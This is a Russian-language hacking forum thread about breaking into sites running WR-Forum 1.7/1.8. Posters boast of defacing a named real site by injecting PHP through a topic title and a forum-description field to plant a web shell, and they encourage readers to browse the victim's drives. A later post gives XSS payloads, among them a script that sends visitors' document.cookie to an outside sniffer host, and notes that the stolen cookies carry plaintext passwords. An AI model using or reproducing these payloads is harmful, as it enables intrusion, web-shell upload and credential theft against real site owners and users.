![]() |
Дефейс через форум WR-Forum © 1.7 M
Значит дефейс делал не я а знакомый (don_Pedro)
Глюк форума - неправильная проверка названия темы. В назание темы можно написать PHP код:
PHP код:
Результат http://www.klipov.net/forum/ http://www.klipov.net/remview.php Подпись http://www.klipov.net/ :D По названию видно что клипов там нет. Поэтому заходим на диск D: E: Z: и берём там неклипы, нефильмы и т.д. Просиба не хамить там (не вы же старались). Ну разве чуть-чуть. |
ну Brun немножно сухо написал.... попробую добавить...
Сначала вытянул пас админа (это другая история :D ) так вот, залез в админку.... подумал как залить шел.... Форум, сразу скажу совковый, нет ниодной опции чтобы залить туда какой-нить файл... нарыл интересную опцию "описание форума" Попробовал вставить туда PHP код:
потом начал думать.... в каком виде может сохранятся это описание.... скорее всего это происходит так PHP код:
ну попробовал ввести вот-так PHP код:
сначала нам надо сообщить РНР, что переменная, в которую записывается описание форума уже "закончилась". вот для этого ставим PHP код:
PHP код:
и последний штрих PHP код:
Цитата:
PHP код:
проверил - работает...... ну если работает, то что нам мешает вместо любимого PHP код:
кто-то скажет: ведь длина описания наверно регулируется... а фиг вам, таварисчи, если творцы форума ламеры, то они ламеры во всем :D вставил код шела, перед этим убрал PHP код:
вот так вот :) ЗЫЖ а шо это я под ником don_Pedro не смог зарегицца? :( вродь нет такого юзера.... |
Не тот сайт ломал блин :d , там медленно качается 9кб/с
Кстати там XSS есть ? |
2nix
а хз, не проверял, кстати, ты хоть смотрел на тот сайт?? :) прикол в том, что делал его один мего-ламер, хостится это все дело у него на компе дома, кажись в Испании, на винде... а ща самое интересное.... НА ДЕНВЕРЕ :D кстати он типа пропалил.. ну ниче, еще что-нить найдем :D |
Цитата:
|
точнее там идет преобразование функцией eval, без экранирования "
|
Цитата:
|
не ну да, но...... поперло :)
тем более... не хакер я :rolleyes: разве шо чуть-чуть :D |
Напишу мини-мануал-историю (надо же мне на этом форуме с чего то начинать!) На форуме WR-Forum © 1.8 совершенно нет проверки на html у себя в подписи... да что там в подписи, вообще практически нигде нету! ;) Дело было где то часа в 2 ночи... думаю... проект новенький, интересный! есть раздел по JavaScript где мне могут помочь! Но тут столкнулся с неприятностью... В нужном разделе показалось сообщение: Цитата:
Код:
index.php?fid=8&newtema=addМ... понравилось! решил поиграть с форумом) гыгы) автор скрипта-редиска! Код:
index.php?fid=9999&newtema=addindex.php?fid=x x-любая цифра :) хех... ещё при добавлении сообщения можно спокойно вернуться назад и ещё раз добавить мессагу) короче оспамить легко! А теперь самое интересное... XSS У себя в инфе в подписи, да и в других полях анкеты делайте что хотите! =) Хотим что бы жуткий аллерт досаждал посетителям? Пишем у себя в статусе: Код:
<IMG SRC=JaVaScRiPt:alert('XSS by DCRM')>Возьмём к примеру снифер: Код:
http://s.netsec.ru/Код:
<script>img.src = "'http://s.netsec.ru/ваш логин.gif?'+document.cookie;"</script>Код:
<SCRIPT SRC="http://%77ww.xxx.xx/x.xx"></script>И того, это первый мой интересный взлом) спасибо за внимание! :D P.s. а дальше дело техники и воображения) Админ есть... куки есть, кстати в незашифрованном виде там пассы... ;) |
| Время: 10:31 |